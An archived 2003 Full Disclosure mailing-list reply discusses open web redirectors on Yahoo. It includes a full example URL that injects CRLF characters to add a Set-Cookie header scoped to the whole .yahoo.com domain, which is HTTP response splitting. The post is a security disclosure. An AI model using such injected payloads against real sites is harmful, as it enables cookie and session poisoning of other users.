Full Disclosure mailing list archives
Re: CERT: Vulnerability in web redirectors
From: David Leadbeater <dgl () dgl cx>
Date: Sat, 22 Mar 2003 21:19:16 +0000
Georgi Guninski wrote:
Like this one?: -------------------- http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org -------------------- (may be wrapped)
That site also demonstrates another issue with this type of HTTP Redirector that has been mentioned as a security risk before: http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/ It adds a cookie for the whole .yahoo.com domain, this could be an attack vector for other XSS (I wouldn't be surprised if there is less checking done on cookie input) or session poisoning type attacks. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- CERT: Vulnerability in web redirectors hack4life (Mar 21)
- Re: CERT: Vulnerability in web redirectors Kurt Seifried (Mar 22)
- Re: CERT: Vulnerability in web redirectors Georgi Guninski (Mar 22)
- Re: CERT: Vulnerability in web redirectors David Leadbeater (Mar 22)
- Re: CERT: Vulnerability in web redirectors Georgi Guninski (Mar 22)
- <Possible follow-ups>
- Fw: CERT: Vulnerability in web redirectors http-equiv () excite com (Mar 22)
- Re: CERT: Vulnerability in web redirectors Kurt Seifried (Mar 22)